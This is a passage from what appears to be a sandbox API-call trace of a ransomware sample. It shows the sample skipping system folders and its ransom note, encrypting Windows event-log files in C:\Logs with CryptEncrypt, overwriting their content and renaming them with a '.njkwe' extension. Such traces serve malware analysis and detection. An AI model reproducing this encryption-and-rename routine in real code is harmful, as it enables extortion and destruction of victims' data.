ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0066.594] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="Windows") returned -1 [0066.595] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.595] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.595] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="Program Files") returned -1 [0066.595] lstrcmpiW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.595] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 52 [0066.595] StrStrIW (lpFirst="Microsoft-Windows-NCSI%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.595] lstrcmpW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.595] lstrcmpW (lpString1="Microsoft-Windows-NCSI%4Operational.evtx", lpString2="taridd") returned -1 [0066.595] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.595] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.595] GetTickCount () returned 0x11510b6 [0066.595] GetTickCount () returned 0x11510b6 [0066.595] GetTickCount () returned 0x11510b6 [0066.595] GetTickCount () returned 0x11510b6 [0066.595] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.595] GetProcessHeap () returned 0xbe0000 [0066.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.595] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.598] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.598] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.598] GetProcessHeap () returned 0xbe0000 [0066.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.598] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.598] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.598] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.598] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.598] CloseHandle (hObject=0x428) returned 1 [0066.600] GetProcessHeap () returned 0xbe0000 [0066.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.600] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 72 [0066.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.601] GetProcessHeap () returned 0xbe0000 [0066.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.601] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0066.601] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="Windows") returned -1 [0066.601] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.601] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.601] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="Program Files") returned -1 [0066.601] lstrcmpiW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.601] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 62 [0066.601] StrStrIW (lpFirst="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.601] lstrcmpW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.601] lstrcmpW (lpString1="Microsoft-Windows-NetworkProfile%4Operational.evtx", lpString2="taridd") returned -1 [0066.601] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.601] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.601] GetTickCount () returned 0x11510b6 [0066.601] GetTickCount () returned 0x11510b6 [0066.602] GetTickCount () returned 0x11510b6 [0066.602] GetTickCount () returned 0x11510b6 [0066.602] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.602] GetProcessHeap () returned 0xbe0000 [0066.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.602] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.605] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.605] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.605] GetProcessHeap () returned 0xbe0000 [0066.605] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.605] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.605] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.605] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.605] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.605] CloseHandle (hObject=0x428) returned 1 [0066.607] GetProcessHeap () returned 0xbe0000 [0066.607] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.607] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 82 [0066.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.608] GetProcessHeap () returned 0xbe0000 [0066.608] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.608] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0066.608] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="Windows") returned -1 [0066.608] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.608] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.608] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="Program Files") returned -1 [0066.608] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.608] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 52 [0066.608] StrStrIW (lpFirst="Microsoft-Windows-Ntfs%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.608] lstrcmpW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.608] lstrcmpW (lpString1="Microsoft-Windows-Ntfs%4Operational.evtx", lpString2="taridd") returned -1 [0066.608] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.608] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.609] GetTickCount () returned 0x11510c5 [0066.609] GetTickCount () returned 0x11510c5 [0066.609] GetTickCount () returned 0x11510c5 [0066.609] GetTickCount () returned 0x11510c5 [0066.609] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.609] GetProcessHeap () returned 0xbe0000 [0066.609] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.609] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.611] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.611] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.611] GetProcessHeap () returned 0xbe0000 [0066.611] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.611] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.611] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.612] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.612] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.612] CloseHandle (hObject=0x428) returned 1 [0066.614] GetProcessHeap () returned 0xbe0000 [0066.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.614] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 72 [0066.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.614] GetProcessHeap () returned 0xbe0000 [0066.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.614] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0066.614] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="Windows") returned -1 [0066.614] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="$Recycle.bin") returned 1 [0066.614] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="System Volume Information") returned -1 [0066.614] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="Program Files") returned -1 [0066.614] lstrcmpiW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="Program Files (x86)") returned -1 [0066.615] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 44 [0066.615] StrStrIW (lpFirst="Microsoft-Windows-Ntfs%4WHC.evtx", lpSrch=".njkwe") returned 0x0 [0066.615] lstrcmpW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.615] lstrcmpW (lpString1="Microsoft-Windows-Ntfs%4WHC.evtx", lpString2="taridd") returned -1 [0066.615] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.615] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.616] GetTickCount () returned 0x11510c5 [0066.616] GetTickCount () returned 0x11510c5 [0066.616] GetTickCount () returned 0x11510c5 [0066.616] GetTickCount () returned 0x11510c5 [0066.616] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.616] GetProcessHeap () returned 0xbe0000 [0066.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.616] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.618] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.618] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.618] GetProcessHeap () returned 0xbe0000 [0066.618] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.618] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.618] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.618] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.618] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.619] CloseHandle (hObject=0x428) returned 1 [0066.621] GetProcessHeap () returned 0xbe0000 [0066.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.621] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx_r00t_{3sXlE5}.njkwe") returned 64 [0066.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.621] GetProcessHeap () returned 0xbe0000 [0066.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.621] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0066.621] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="Windows") returned -1 [0066.621] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="$Recycle.bin") returned 1 [0066.621] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="System Volume Information") returned -1 [0066.621] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="Program Files") returned -1 [0066.621] lstrcmpiW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="Program Files (x86)") returned -1 [0066.621] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 86 [0066.622] StrStrIW (lpFirst="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpSrch=".njkwe") returned 0x0 [0066.622] lstrcmpW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.622] lstrcmpW (lpString1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpString2="taridd") returned -1 [0066.622] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.622] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.623] GetTickCount () returned 0x11510d5 [0066.623] GetTickCount () returned 0x11510d5 [0066.623] GetTickCount () returned 0x11510d5 [0066.623] GetTickCount () returned 0x11510d5 [0066.623] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.623] GetProcessHeap () returned 0xbe0000 [0066.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.623] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.625] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.625] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.625] GetProcessHeap () returned 0xbe0000 [0066.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: 